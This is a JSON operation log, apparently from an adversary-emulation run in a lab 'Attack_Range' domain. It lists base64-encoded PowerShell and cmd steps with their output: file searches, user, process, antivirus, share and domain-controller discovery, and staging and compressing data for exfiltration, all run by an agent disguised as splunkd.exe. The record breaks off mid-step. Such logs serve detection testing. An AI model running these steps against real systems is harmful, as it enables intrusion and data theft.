@rosplk
Created April 1, 2020 03:00
{
"name": "Attack_Range",
"host_group": [
{
"paw": "fasecd",
"group": "red",
"architecture": "amd64",
"platform": "windows",
"server": "http://54.188.251.146:8888",
"location": "C:\\Users\\Public\\splunkd.exe",
"pid": 6524,
"ppid": 5136,
"trusted": true,
"last_seen": "2020-03-22 00:28:28",
"sleep_min": 30,
"sleep_max": 60,
"executors": [
"shellcode_amd64",
"cmd",
"psh"
],
"privilege": "Elevated",
"display_name": "win-dc$ATTACKRANGE\\administrator",
"exe_name": "splunkd.exe",
"host": "win-dc",
"watchdog": 0,
"contact": "http"
}
],
"start": "2020-03-22 00:24:57",
"steps": {
"fasecd": {
"steps": [
{
"ability_id": "90c2efaa-8205-480d-8bb6-61d90dbaf81b",
"command": "R2V0LUNoaWxkSXRlbSBDOlxVc2VycyAtUmVjdXJzZSAtSW5jbHVkZSAqLndhdiAtRXJyb3JBY3Rpb24gJ1NpbGVudGx5Q29udGludWUnIHwgZm9yZWFjaCB7JF8uRnVsbE5hbWV9IHwgU2VsZWN0LU9iamVjdCAtZmlyc3QgNTtleGl0IDA7",
"delegated": "2020-03-22 00:24:57",
"run": "2020-03-22 00:25:28",
"status": 0,
"platform": "windows",
"executor": "psh",
"pid": 6108,
"description": "Locate files deemed sensitive",
"name": "Find files",
"attack": {
"tactic": "collection",
"technique_name": "Data from Local System",
"technique_id": "T1005"
}
},
{
"ability_id": "90c2efaa-8205-480d-8bb6-61d90dbaf81b",
"command": "R2V0LUNoaWxkSXRlbSBDOlxVc2VycyAtUmVjdXJzZSAtSW5jbHVkZSAqLnltbCAtRXJyb3JBY3Rpb24gJ1NpbGVudGx5Q29udGludWUnIHwgZm9yZWFjaCB7JF8uRnVsbE5hbWV9IHwgU2VsZWN0LU9iamVjdCAtZmlyc3QgNTtleGl0IDA7",
"delegated": "2020-03-22 00:24:57",
"run": "2020-03-22 00:25:36",
"status": 0,
"platform": "windows",
"executor": "psh",
"pid": 5948,
"description": "Locate files deemed sensitive",
"name": "Find files",
"attack": {
"tactic": "collection",
"technique_name": "Data from Local System",
"technique_id": "T1005"
}
},
{
"ability_id": "90c2efaa-8205-480d-8bb6-61d90dbaf81b",
"command": "R2V0LUNoaWxkSXRlbSBDOlxVc2VycyAtUmVjdXJzZSAtSW5jbHVkZSAqLnBuZyAtRXJyb3JBY3Rpb24gJ1NpbGVudGx5Q29udGludWUnIHwgZm9yZWFjaCB7JF8uRnVsbE5hbWV9IHwgU2VsZWN0LU9iamVjdCAtZmlyc3QgNTtleGl0IDA7",
"delegated": "2020-03-22 00:24:57",
"run": "2020-03-22 00:25:44",
"status": 0,
"platform": "windows",
"executor": "psh",
"pid": 5252,
"description": "Locate files deemed sensitive",
"name": "Find files",
"attack": {
"tactic": "collection",
"technique_name": "Data from Local System",
"technique_id": "T1005"
}
},
{
"ability_id": "c0da588f-79f0-4263-8998-7496b1a40596",
"command": "JGVudjp1c2VybmFtZQ==",
"delegated": "2020-03-22 00:24:57",
"run": "2020-03-22 00:25:52",
"status": 0,
"platform": "windows",
"executor": "psh",
"pid": 3576,
"description": "Find user running agent",
"name": "Identify active user",
"attack": {
"tactic": "discovery",
"technique_name": "System Owner/User Discovery",
"technique_id": "T1033"
},
"output": "administrator\r"
},
{
"ability_id": "6469befa-748a-4b9c-a96d-f191fde47d89",
"command": "TmV3LUl0ZW0gLVBhdGggIi4iIC1OYW1lICJzdGFnZWQiIC1JdGVtVHlwZSAiZGlyZWN0b3J5IiAtRm9yY2UgfCBmb3JlYWNoIHskXy5GdWxsTmFtZX0gfCBTZWxlY3QtT2JqZWN0",
"delegated": "2020-03-22 00:24:57",
"run": "2020-03-22 00:25:56",
"status": 0,
"platform": "windows",
"executor": "psh",
"pid": 5676,
"description": "create a directory for exfil staging",
"name": "Create staging directory",
"attack": {
"tactic": "collection",
"technique_name": "Data Staged",
"technique_id": "T1074"
},
"output": "C:\\Users\\Administrator\\staged\r"
},
{
"ability_id": "feaced8f-f43f-452a-9500-a5219488abb8",
"command": "R2V0LVdtaU9iamVjdCAtQ2xhc3MgV2luMzJfVXNlckFjY291bnQ=",
"delegated": "2020-03-22 00:24:57",
"run": "2020-03-22 00:26:01",
"status": 0,
"platform": "windows",
"executor": "psh",
"pid": 6692,
"description": "Identify all local users",
"name": "Identify local users",
"attack": {
"tactic": "discovery",
"technique_name": "Permission Groups Discovery",
"technique_id": "T1069"
},
"output": "\r\rAccountType : 512\rCaption : ATTACKRANGE\\Administrator\rDomain : ATTACKRANGE\rSID : S-1-5-21-1511907433-3423355854-30249204-500\rFullName : \rName : Administrator\r\rAccountType : 512\rCaption : ATTACKRANGE\\Guest\rDomain : ATTACKRANGE\rSID : S-1-5-21-1511907433-3423355854-30249204-501\rFullName : \rName : Guest\r\rAccountType : 512\rCaption : ATTACKRANGE\\krbtgt\rDomain : ATTACKRANGE\rSID : S-1-5-21-1511907433-3423355854-30249204-502\rFullName : \rName : krbtgt\r\rAccountType : 512\rCaption : ATTACKRANGE\\DefaultAccount\rDomain : ATTACKRANGE\rSID : S-1-5-21-1511907433-3423355854-30249204-503\rFullName : \rName : DefaultAccount\r\r\r\r"
},
{
"ability_id": "3b5db901-2cb8-4df7-8043-c4628a6a5d5a",
"command": "JG93bmVycyA9IEB7fTtnd21pIHdpbjMyX3Byb2Nlc3MgfCUgeyRvd25lcnNbJF8uaGFuZGxlXSA9ICRfLmdldG93bmVyKCkudXNlcn07JHBzID0gZ2V0LXByb2Nlc3MgfCBzZWxlY3QgcHJvY2Vzc25hbWUsSWQsQHtsPSJPd25lciI7ZT17JG93bmVyc1skXy5pZC50b3N0cmluZygpXX19O2ZvcmVhY2goJHAgaW4gJHBzKSB7ICAgIGlmKCRwLk93bmVyIC1lcSAiYWRtaW5pc3RyYXRvciIpIHsgICAgICAgICRwOyAgICB9fQ==",
"delegated": "2020-03-22 00:26:03",
"run": "2020-03-22 00:26:07",
"status": 0,
"platform": "windows",
"executor": "psh",
"pid": 4068,
"description": "Get process info for processes running as a user",
"name": "Find user processes",
"attack": {
"tactic": "discovery",
"technique_name": "Process Discovery",
"technique_id": "T1057"
},
"output": "\rProcessName Id Owner \r----------- -- ----- \rconhost 2020 administrator\rconhost 2548 administrator\rconhost 5320 administrator\rexplorer 816 administrator\rpowershell 4068 administrator\rpowershell 5136 administrator\rrdpclip 4648 administrator\rRuntimeBroker 3568 administrator\rSearchUI 5380 administrator\rShellExperienceHost 5268 administrator\rsihost 1468 administrator\rsplunkd 6524 administrator\rsvchost 4680 administrator\rtaskhostw 3900 administrator\rwinrshost 2448 administrator\r\r\r"
},
{
"ability_id": "2dece965-37a0-4f70-a391-0f30e3331aba",
"command": "d21pYyAvTkFNRVNQQUNFOlxccm9vdFxTZWN1cml0eUNlbnRlcjIgUEFUSCBBbnRpVmlydXNQcm9kdWN0IEdFVCAvdmFsdWU=",
"delegated": "2020-03-22 00:26:03",
"run": "2020-03-22 00:26:15",
"status": 1,
"platform": "windows",
"executor": "psh",
"pid": 4720,
"description": "Identify AV",
"name": "Discover antivirus programs",
"attack": {
"tactic": "discovery",
"technique_name": "Security Software Discovery",
"technique_id": "T1063"
},
"output": "ERROR:\r\rDescription = Not found\r\r"
},
{
"ability_id": "5c4dd985-89e3-4590-9b57-71fed66ff4e2",
"command": "Z3ByZXN1bHQgL1I=",
"delegated": "2020-03-22 00:26:03",
"run": "2020-03-22 00:26:20",
"status": 0,
"platform": "windows",
"executor": "psh",
"pid": 4468,
"description": "Summary of permission and security groups",
"name": "Permission Groups Discovery",
"attack": {
"tactic": "discovery",
"technique_name": "Permission Groups Discovery",
"technique_id": "T1069"
},
"output": "\rMicrosoft (R) Windows (R) Operating System Group Policy Result tool v2.0\rc 2016 Microsoft Corporation. All rights reserved.\r\rCreated on 3/22/2020 at 12:26:20 AM\r\r\r\rRSOP data for ATTACKRANGE\\administrator on WIN-DC : Logging Mode\r-----------------------------------------------------------------\r\rOS Configuration: Primary Domain Controller\rOS Version: 10.0.14393\rSite Name: Default-First-Site-Name\rRoaming Profile: N/A\rLocal Profile: C:\\Users\\Administrator\rConnected over a slow link?: No\r\r\rCOMPUTER SETTINGS\r------------------\r CN=WIN-DC,OU=Domain Controllers,DC=attackrange,DC=local\r Last time Group Policy was applied: 3/22/2020 at 12:22:51 AM\r Group Policy was applied from: win-dc.attackrange.local\r Group Policy slow link threshold: 500 kbps\r Domain Name: ATTACKRANGE\r Domain Type: Windows 2008 or later\r\r Applied Group Policy Objects\r -----------------------------\r Default Domain Controllers Policy\r Default Domain Policy\r\r The following GPOs were not applied because they were filtered out\r -------------------------------------------------------------------\r Local Group Policy\r Filtering: Not Applied (Empty)\r\r The computer is a part of the following security groups\r -------------------------------------------------------\r System Mandatory Level\r Everyone\r BUILTIN\\Users\r NT AUTHORITY\\SERVICE\r CONSOLE LOGON\r NT AUTHORITY\\Authenticated Users\r This Organization\r BITS\r CertPropSvc\r DcpSvc\r dmwappushservice\r DsmSvc\r Eaphost\r IKEEXT\r iphlpsvc\r lfsvc\r MSiSCSI\r NcaSvc\r NetSetupSvc\r RasAuto\r RasMan\r RemoteAccess\r Schedule\r SCPolicySvc\r SENS\r SessionEnv\r SharedAccess\r ShellHWDetection\r UsoSvc\r wercplsupport\r Winmgmt\r wisvc\r wlidsvc\r WpnService\r wuauserv\r LOCAL\r BUILTIN\\Administrators\r \r\rUSER SETTINGS\r--------------\r CN=Administrator,CN=Users,DC=attackrange,DC=local\r Last time Group Policy was applied: 3/21/2020 at 11:57:49 PM\r Group Policy was applied from: 
win-dc.attackrange.local\r Group Policy slow link threshold: 500 kbps\r Domain Name: ATTACKRANGE\r Domain Type: Windows 2008 or later\r \r Applied Group Policy Objects\r -----------------------------\r N/A\r\r The following GPOs were not applied because they were filtered out\r -------------------------------------------------------------------\r Local Group Policy\r Filtering: Not Applied (Empty)\r\r The user is a part of the following security groups\r ---------------------------------------------------\r Domain Users\r Everyone\r BUILTIN\\Administrators\r BUILTIN\\Users\r BUILTIN\\Pre-Windows 2000 Compatible Access\r REMOTE INTERACTIVE LOGON\r NT AUTHORITY\\INTERACTIVE\r NT AUTHORITY\\Authenticated Users\r This Organization\r LOCAL\r Group Policy Creator Owners\r Domain Admins\r Schema Admins\r Enterprise Admins\r Authentication authority asserted identity\r Denied RODC Password Replication Group\r High Mandatory Level\r "
},
{
"ability_id": "8c06ebf8-bacf-486b-bd77-21ba8c5a5777",
"command": "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",
"delegated": "2020-03-22 00:26:03",
"run": "2020-03-22 00:26:24",
"status": 1,
"platform": "windows",
"executor": "psh",
"pid": 6940,
"description": "Identify Firewalls",
"name": "Identify Firewalls",
"attack": {
"tactic": "discovery",
"technique_name": "Security Software Discovery",
"technique_id": "T1063"
},
"output": "Get-WmiObject : Invalid parameter \rAt line:1 char:189\r+ ... ct -First 1;Get-WmiObject -Namespace \"root\\$SecurityCenter\" -Class An ...\r+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\r + CategoryInfo : InvalidOperation: (:) [Get-WmiObject], ManagementException\r + FullyQualifiedErrorId : GetWMIManagementException,Microsoft.PowerShell.Commands.GetWmiObjectCommand\r \r"
},
{
"ability_id": "b22b3b47-6219-4504-a2e6-ae8263e49fc3",
"command": "bmx0ZXN0IC9kY2xpc3Q6JVVTRVJET01BSU4l",
"delegated": "2020-03-22 00:26:03",
"run": "2020-03-22 00:26:33",
"status": 0,
"platform": "windows",
"executor": "psh",
"pid": 5752,
"description": "Identify remote domain controller",
"name": "Find domain controller",
"attack": {
"tactic": "discovery",
"technique_name": "Remote System Discovery",
"technique_id": "T1018"
},
"output": "Cannot find DC to get DC list from.Status = 1355 0x54b ERROR_NO_SUCH_DOMAIN\r"
},
{
"ability_id": "530e47c6-8592-42bf-91df-c59ffbd8541b",
"command": "R2V0LVNtYlNoYXJlIHwgQ29udmVydFRvLUpzb24=",
"delegated": "2020-03-22 00:26:03",
"run": "2020-03-22 00:26:38",
"status": 0,
"platform": "windows",
"executor": "psh",
"pid": 6724,
"description": "Network Share Discovery",
"name": "View admin shares",
"attack": {
"tactic": "discovery",
"technique_name": "Network Share Discovery",
"technique_id": "T1135"
},
"output": "[\r {\r \"CimClass\": {\r \"CimSuperClassName\": null,\r \"CimSuperClass\": null,\r \"CimClassProperties\": \"AvailabilityType CachingMode CATimeout ConcurrentUserLimit ContinuouslyAvailable CurrentUsers Description EncryptData FolderEnumerationMode Name Path Scoped ScopeName SecurityDescriptor ShadowCopy ShareState ShareType SmbInstance Special Temporary Volume\",\r \"CimClassQualifiers\": \"ClassVersion = \\\"30\\\" Description = \\\"31\\\" dynamic = True provider = \\\"smbwmiv2\\\"\",\r \"CimClassMethods\": \"CreateShare GrantAccess RevokeAccess BlockAccess UnblockAccess GetAccessControlEntries EnumerateShares GetShare FireShareChangeEvent\",\r \"CimSystemProperties\": \"Microsoft.Management.Infrastructure.CimSystemProperties\"\r },\r \"CimInstanceProperties\": [\r \"AvailabilityType = 0\",\r \"CachingMode = 1\",\r \"CATimeout = 0\",\r \"ConcurrentUserLimit = 0\",\r \"ContinuouslyAvailable = False\",\r \"CurrentUsers = 0\",\r \"Description = \\\"Remote Admin\\\"\",\r \"EncryptData = False\",\r \"FolderEnumerationMode = 1\",\r \"Name = \\\"ADMIN?\\\"\",\r \"Path = \\\"C:\\\\Windows\\\"\",\r \"Scoped = False\",\r \"ScopeName = \\\"*\\\"\",\r \"SecurityDescriptor = \\\"O:SYG:SYD:(A;;GA;;;BA)(A;;GA;;;BO)(A;;G...\",\r \"ShadowCopy = False\",\r \"ShareState = 1\",\r \"ShareType = 0\",\r \"SmbInstance = 0\",\r \"Special = True\",\r \"Temporary = False\",\r \"Volume = \\\"\\\\\\\\?\\\\Volume{c10d87a2-0000-0000-0000-1000...\"\r ],\r \"CimSystemProperties\": {\r \"Namespace\": \"ROOT/Microsoft/Windows/SMB\",\r \"ServerName\": \"WIN-DC\",\r \"ClassName\": \"MSFT_SmbShare\",\r \"Path\": null\r },\r \"PresetPathAcl\": null,\r \"ShareState\": 1,\r \"AvailabilityType\": 0,\r \"ShareType\": 0,\r \"FolderEnumerationMode\": 1,\r \"CachingMode\": 1,\r \"SmbInstance\": 0,\r \"CATimeout\": 0,\r \"ConcurrentUserLimit\": 0,\r \"ContinuouslyAvailable\": false,\r \"CurrentUsers\": 0,\r \"Description\": \"Remote Admin\",\r \"EncryptData\": false,\r \"Name\": \"ADMIN$\",\r 
\"Path\": \"C:\\\\Windows\",\r \"Scoped\": false,\r \"ScopeName\": \"*\",\r \"SecurityDescriptor\": \"O:SYG:SYD:(A;;GA;;;BA)(A;;GA;;;BO)(A;;GA;;;IU)\",\r \"ShadowCopy\": false,\r \"Special\": true,\r \"Temporary\": false,\r \"Volume\": \"\\\\\\\\?\\\\Volume{c10d87a2-0000-0000-0000-100000000000}\\\\\",\r \"PSComputerName\": null\r },\r {\r \"CimClass\": {\r \"CimSuperClassName\": null,\r \"CimSuperClass\": null,\r \"CimClassProperties\": \"AvailabilityType CachingMode CATimeout ConcurrentUserLimit ContinuouslyAvailable CurrentUsers Description EncryptData FolderEnumerationMode Name Path Scoped ScopeName SecurityDescriptor ShadowCopy ShareState ShareType SmbInstance Special Temporary Volume\",\r \"CimClassQualifiers\": \"ClassVersion = \\\"30\\\" Description = \\\"31\\\" dynamic = True provider = \\\"smbwmiv2\\\"\",\r \"CimClassMethods\": \"CreateShare GrantAccess RevokeAccess BlockAccess UnblockAccess GetAccessControlEntries EnumerateShares GetShare FireShareChangeEvent\",\r \"CimSystemProperties\": \"Microsoft.Management.Infrastructure.CimSystemProperties\"\r },\r \"CimInstanceProperties\": [\r \"AvailabilityType = 0\",\r \"CachingMode = 1\",\r \"CATimeout = 0\",\r \"ConcurrentUserLimit = 0\",\r \"ContinuouslyAvailable = False\",\r \"CurrentUsers = 0\",\r \"Description = \\\"Default share\\\"\",\r \"EncryptData = False\",\r \"FolderEnumerationMode = 1\",\r \"Name = \\\"C?\\\"\",\r \"Path = \\\"C:\\\\\\\"\",\r \"Scoped = False\",\r \"ScopeName = \\\"*\\\"\",\r \"SecurityDescriptor = \\\"O:SYG:SYD:(A;;GA;;;BA)(A;;GA;;;BO)(A;;G...\",\r \"ShadowCopy = False\",\r \"ShareState = 1\",\r \"ShareType = 0\",\r \"SmbInstance = 0\",\r \"Special = True\",\r \"Temporary = False\",\r \"Volume = \\\"\\\\\\\\?\\\\Volume{c10d87a2-0000-0000-0000-1000...\"\r ],\r \"CimSystemProperties\": {\r \"Namespace\": \"ROOT/Microsoft/Windows/SMB\",\r \"ServerName\": \"WIN-DC\",\r \"ClassName\": \"MSFT_SmbShare\",\r \"Path\": null\r },\r \"PresetPathAcl\": null,\r \"ShareState\": 1,\r 
\"AvailabilityType\": 0,\r \"ShareType\": 0,\r \"FolderEnumerationMode\": 1,\r \"CachingMode\": 1,\r \"SmbInstance\": 0,\r \"CATimeout\": 0,\r \"ConcurrentUserLimit\": 0,\r \"ContinuouslyAvailable\": false,\r \"CurrentUsers\": 0,\r \"Description\": \"Default share\",\r \"EncryptData\": false,\r \"Name\": \"C$\",\r \"Path\": \"C:\\\\\",\r \"Scoped\": false,\r \"ScopeName\": \"*\",\r \"SecurityDescriptor\": \"O:SYG:SYD:(A;;GA;;;BA)(A;;GA;;;BO)(A;;GA;;;IU)\",\r \"ShadowCopy\": false,\r \"Special\": true,\r \"Temporary\": false,\r \"Volume\": \"\\\\\\\\?\\\\Volume{c10d87a2-0000-0000-0000-100000000000}\\\\\",\r \"PSComputerName\": null\r },\r {\r \"CimClass\": {\r \"CimSuperClassName\": null,\r \"CimSuperClass\": null,\r \"CimClassProperties\": \"AvailabilityType CachingMode CATimeout ConcurrentUserLimit ContinuouslyAvailable CurrentUsers Description EncryptData FolderEnumerationMode Name Path Scoped ScopeName SecurityDescriptor ShadowCopy ShareState ShareType SmbInstance Special Temporary Volume\",\r \"CimClassQualifiers\": \"ClassVersion = \\\"30\\\" Description = \\\"31\\\" dynamic = True provider = \\\"smbwmiv2\\\"\",\r \"CimClassMethods\": \"CreateShare GrantAccess RevokeAccess BlockAccess UnblockAccess GetAccessControlEntries EnumerateShares GetShare FireShareChangeEvent\",\r \"CimSystemProperties\": \"Microsoft.Management.Infrastructure.CimSystemProperties\"\r },\r \"CimInstanceProperties\": [\r \"AvailabilityType = 0\",\r \"CachingMode = 1\",\r \"CATimeout = 0\",\r \"ConcurrentUserLimit = 0\",\r \"ContinuouslyAvailable = False\",\r \"CurrentUsers = 0\",\r \"Description = \\\"Remote IPC\\\"\",\r \"EncryptData = False\",\r \"FolderEnumerationMode = 1\",\r \"Name = \\\"IPC?\\\"\",\r \"Path = \\\"\\\"\",\r \"Scoped = False\",\r \"ScopeName = \\\"*\\\"\",\r \"SecurityDescriptor = \\\"O:SYG:SYD:(A;;GA;;;BA)(A;;GA;;;BO)(A;;G...\",\r \"ShadowCopy = False\",\r \"ShareState = 1\",\r \"ShareType = 3\",\r \"SmbInstance = 0\",\r \"Special = True\",\r \"Temporary = False\",\r 
\"Volume\"\r ],\r \"CimSystemProperties\": {\r \"Namespace\": \"ROOT/Microsoft/Windows/SMB\",\r \"ServerName\": \"WIN-DC\",\r \"ClassName\": \"MSFT_SmbShare\",\r \"Path\": null\r },\r \"PresetPathAcl\": null,\r \"ShareState\": 1,\r \"AvailabilityType\": 0,\r \"ShareType\": 3,\r \"FolderEnumerationMode\": 1,\r \"CachingMode\": 1,\r \"SmbInstance\": 0,\r \"CATimeout\": 0,\r \"ConcurrentUserLimit\": 0,\r \"ContinuouslyAvailable\": false,\r \"CurrentUsers\": 0,\r \"Description\": \"Remote IPC\",\r \"EncryptData\": false,\r \"Name\": \"IPC$\",\r \"Path\": \"\",\r \"Scoped\": false,\r \"ScopeName\": \"*\",\r \"SecurityDescriptor\": \"O:SYG:SYD:(A;;GA;;;BA)(A;;GA;;;BO)(A;;GA;;;IU)\",\r \"ShadowCopy\": false,\r \"Special\": true,\r \"Temporary\": false,\r \"Volume\": null,\r \"PSComputerName\": null\r },\r {\r \"CimClass\": {\r \"CimSuperClassName\": null,\r \"CimSuperClass\": null,\r \"CimClassProperties\": \"AvailabilityType CachingMode CATimeout ConcurrentUserLimit ContinuouslyAvailable CurrentUsers Description EncryptData FolderEnumerationMode Name Path Scoped ScopeName SecurityDescriptor ShadowCopy ShareState ShareType SmbInstance Special Temporary Volume\",\r \"CimClassQualifiers\": \"ClassVersion = \\\"30\\\" Description = \\\"31\\\" dynamic = True provider = \\\"smbwmiv2\\\"\",\r \"CimClassMethods\": \"CreateShare GrantAccess RevokeAccess BlockAccess UnblockAccess GetAccessControlEntries EnumerateShares GetShare FireShareChangeEvent\",\r \"CimSystemProperties\": \"Microsoft.Management.Infrastructure.CimSystemProperties\"\r },\r \"CimInstanceProperties\": [\r \"AvailabilityType = 0\",\r \"CachingMode = 1\",\r \"CATimeout = 0\",\r \"ConcurrentUserLimit = 0\",\r \"ContinuouslyAvailable = False\",\r \"CurrentUsers = 0\",\r \"Description = \\\"Logon server share \\\"\",\r \"EncryptData = False\",\r \"FolderEnumerationMode = 1\",\r \"Name = \\\"NETLOGON\\\"\",\r \"Path = \\\"C:\\\\Windows\\\\SYSVOL\\\\sysvol\\\\attackrange.lo...\",\r \"Scoped = False\",\r \"ScopeName = 
\\\"*\\\"\",\r \"SecurityDescriptor = \\\"O:BAG:SYD:(A;;0x1200a9;;;WD)(A;;FA;;;BA...\",\r \"ShadowCopy = False\",\r \"ShareState = 1\",\r \"ShareType = 0\",\r \"SmbInstance = 0\",\r \"Special = False\",\r \"Temporary = False\",\r \"Volume = \\\"\\\\\\\\?\\\\Volume{c10d87a2-0000-0000-0000-1000...\"\r ],\r \"CimSystemProperties\": {\r \"Namespace\": \"ROOT/Microsoft/Windows/SMB\",\r \"ServerName\": \"WIN-DC\",\r \"ClassName\": \"MSFT_SmbShare\",\r \"Path\": null\r },\r \"PresetPathAcl\": {\r \"AccessRightType\": \"System.Security.AccessControl.FileSystemRights\",\r \"AccessRuleType\": \"System.Security.AccessControl.FileSystemAccessRule\",\r \"AuditRuleType\": \"System.Security.AccessControl.FileSystemAuditRule\",\r \"AreAccessRulesProtected\": false,\r \"AreAuditRulesProtected\": false,\r \"AreAccessRulesCanonical\": true,\r \"AreAuditRulesCanonical\": true,\r \"PSPath\": \"Microsoft.PowerShell.Core\\\\FileSystem::C:\\\\Windows\\\\SYSVOL\\\\sysvol\\\\attackrange.local\\\\SCRIPTS\",\r \"PSParentPath\": \"Microsoft.PowerShell.Core\\\\FileSystem::C:\\\\Windows\\\\SYSVOL\\\\sysvol\\\\attackrange.local\",\r \"PSChildName\": \"SCRIPTS\",\r \"PSDrive\": \"C\",\r \"PSProvider\": \"Microsoft.PowerShell.Core\\\\FileSystem\",\r \"CentralAccessPolicyId\": null,\r \"CentralAccessPolicyName\": null,\r \"Path\": \"Microsoft.PowerShell.Core\\\\FileSystem::C:\\\\Windows\\\\SYSVOL\\\\sysvol\\\\attackrange.local\\\\SCRIPTS\",\r \"Owner\": \"BUILTIN\\\\Administrators\",\r \"Group\": \"NT AUTHORITY\\\\SYSTEM\",\r \"Access\": \"System.Security.AccessControl.FileSystemAccessRule System.Security.AccessControl.FileSystemAccessRule\",\r \"Sddl\": \"O:BAG:SYD:(A;OICI;0x1200a9;;;WD)(A;OICI;FA;;;BA)\",\r \"AccessToString\": \"Everyone Allow ReadAndExecute, Synchronize\\nBUILTIN\\\\Administrators Allow FullControl\",\r \"AuditToString\": \"\"\r },\r \"ShareState\": 1,\r \"AvailabilityType\": 0,\r \"ShareType\": 0,\r \"FolderEnumerationMode\": 1,\r \"CachingMode\": 1,\r \"SmbInstance\": 0,\r 
\"CATimeout\": 0,\r \"ConcurrentUserLimit\": 0,\r \"ContinuouslyAvailable\": false,\r \"CurrentUsers\": 0,\r \"Description\": \"Logon server share \",\r \"EncryptData\": false,\r \"Name\": \"NETLOGON\",\r \"Path\": \"C:\\\\Windows\\\\SYSVOL\\\\sysvol\\\\attackrange.local\\\\SCRIPTS\",\r \"Scoped\": false,\r \"ScopeName\": \"*\",\r \"SecurityDescriptor\": \"O:BAG:SYD:(A;;0x1200a9;;;WD)(A;;FA;;;BA)\",\r \"ShadowCopy\": false,\r \"Special\": false,\r \"Temporary\": false,\r \"Volume\": \"\\\\\\\\?\\\\Volume{c10d87a2-0000-0000-0000-100000000000}\\\\\",\r \"PSComputerName\": null\r },\r {\r \"CimClass\": {\r \"CimSuperClassName\": null,\r \"CimSuperClass\": null,\r \"CimClassProperties\": \"AvailabilityType CachingMode CATimeout ConcurrentUserLimit ContinuouslyAvailable CurrentUsers Description EncryptData FolderEnumerationMode Name Path Scoped ScopeName SecurityDescriptor ShadowCopy ShareState ShareType SmbInstance Special Temporary Volume\",\r \"CimClassQualifiers\": \"ClassVersion = \\\"30\\\" Description = \\\"31\\\" dynamic = True provider = \\\"smbwmiv2\\\"\",\r \"CimClassMethods\": \"CreateShare GrantAccess RevokeAccess BlockAccess UnblockAccess GetAccessControlEntries EnumerateShares GetShare FireShareChangeEvent\",\r \"CimSystemProperties\": \"Microsoft.Management.Infrastructure.CimSystemProperties\"\r },\r \"CimInstanceProperties\": [\r \"AvailabilityType = 0\",\r \"CachingMode = 1\",\r \"CATimeout = 0\",\r \"ConcurrentUserLimit = 0\",\r \"ContinuouslyAvailable = False\",\r \"CurrentUsers = 0\",\r \"Description = \\\"Logon server share \\\"\",\r \"EncryptData = False\",\r \"FolderEnumerationMode = 1\",\r \"Name = \\\"SYSVOL\\\"\",\r \"Path = \\\"C:\\\\Windows\\\\SYSVOL\\\\sysvol\\\"\",\r \"Scoped = False\",\r \"ScopeName = \\\"*\\\"\",\r \"SecurityDescriptor = \\\"O:BAG:SYD:(A;;0x1200a9;;;WD)(A;;FA;;;BA...\",\r \"ShadowCopy = False\",\r \"ShareState = 1\",\r \"ShareType = 0\",\r \"SmbInstance = 0\",\r \"Special = False\",\r \"Temporary = False\",\r \"Volume = 
\\\"\\\\\\\\?\\\\Volume{c10d87a2-0000-0000-0000-1000...\"\r ],\r \"CimSystemProperties\": {\r \"Namespace\": \"ROOT/Microsoft/Windows/SMB\",\r \"ServerName\": \"WIN-DC\",\r \"ClassName\": \"MSFT_SmbShare\",\r \"Path\": null\r },\r \"PresetPathAcl\": {\r \"AccessRightType\": \"System.Security.AccessControl.FileSystemRights\",\r \"AccessRuleType\": \"System.Security.AccessControl.FileSystemAccessRule\",\r \"AuditRuleType\": \"System.Security.AccessControl.FileSystemAuditRule\",\r \"AreAccessRulesProtected\": false,\r \"AreAuditRulesProtected\": false,\r \"AreAccessRulesCanonical\": true,\r \"AreAuditRulesCanonical\": true,\r \"PSPath\": \"Microsoft.PowerShell.Core\\\\FileSystem::C:\\\\Windows\\\\SYSVOL\\\\sysvol\",\r \"PSParentPath\": \"Microsoft.PowerShell.Core\\\\FileSystem::C:\\\\Windows\\\\SYSVOL\",\r \"PSChildName\": \"sysvol\",\r \"PSDrive\": \"C\",\r \"PSProvider\": \"Microsoft.PowerShell.Core\\\\FileSystem\",\r \"CentralAccessPolicyId\": null,\r \"CentralAccessPolicyName\": null,\r \"Path\": \"Microsoft.PowerShell.Core\\\\FileSystem::C:\\\\Windows\\\\SYSVOL\\\\sysvol\",\r \"Owner\": \"BUILTIN\\\\Administrators\",\r \"Group\": \"NT AUTHORITY\\\\SYSTEM\",\r \"Access\": \"System.Security.AccessControl.FileSystemAccessRule System.Security.AccessControl.FileSystemAccessRule System.Security.AccessControl.FileSystemAccessRule\",\r \"Sddl\": \"O:BAG:SYD:(A;OICI;0x1200a9;;;WD)(A;OICI;FA;;;AU)(A;OICI;FA;;;BA)\",\r \"AccessToString\": \"Everyone Allow ReadAndExecute, Synchronize\\nNT AUTHORITY\\\\Authenticated Users Allow FullControl\\nBUILTIN\\\\Administrators Allow FullControl\",\r \"AuditToString\": \"\"\r },\r \"ShareState\": 1,\r \"AvailabilityType\": 0,\r \"ShareType\": 0,\r \"FolderEnumerationMode\": 1,\r \"CachingMode\": 1,\r \"SmbInstance\": 0,\r \"CATimeout\": 0,\r \"ConcurrentUserLimit\": 0,\r \"ContinuouslyAvailable\": false,\r \"CurrentUsers\": 0,\r \"Description\": \"Logon server share \",\r \"EncryptData\": false,\r \"Name\": \"SYSVOL\",\r \"Path\": 
\"C:\\\\Windows\\\\SYSVOL\\\\sysvol\",\r \"Scoped\": false,\r \"ScopeName\": \"*\",\r \"SecurityDescriptor\": \"O:BAG:SYD:(A;;0x1200a9;;;WD)(A;;FA;;;BA)(A;;FA;;;AU)\",\r \"ShadowCopy\": false,\r \"Special\": false,\r \"Temporary\": false,\r \"Volume\": \"\\\\\\\\?\\\\Volume{c10d87a2-0000-0000-0000-100000000000}\\\\\",\r \"PSComputerName\": null\r }\r]\r"
},
{
"ability_id": "300157e5-f4ad-4569-b533-9d1fa0e74d74",
"command": "Q29tcHJlc3MtQXJjaGl2ZSAtUGF0aCBDOlxVc2Vyc1xBZG1pbmlzdHJhdG9yXHN0YWdlZCAtRGVzdGluYXRpb25QYXRoIEM6XFVzZXJzXEFkbWluaXN0cmF0b3Jcc3RhZ2VkLnppcCAtRm9yY2U7c2xlZXAgMTsgbHMgQzpcVXNlcnNcQWRtaW5pc3RyYXRvclxzdGFnZWQuemlwIHwgZm9yZWFjaCB7JF8uRnVsbE5hbWV9IHwgc2VsZWN0",
"delegated": "2020-03-22 00:26:39",
"run": "2020-03-22 00:26:47",
"status": 1,
"platform": "windows",
"executor": "psh",
"pid": 6868,
"description": "Compress a directory on the file system",
"name": "Compress staged directory",
"attack": {
"tactic": "exfiltration",
"technique_name": "Data Compressed",
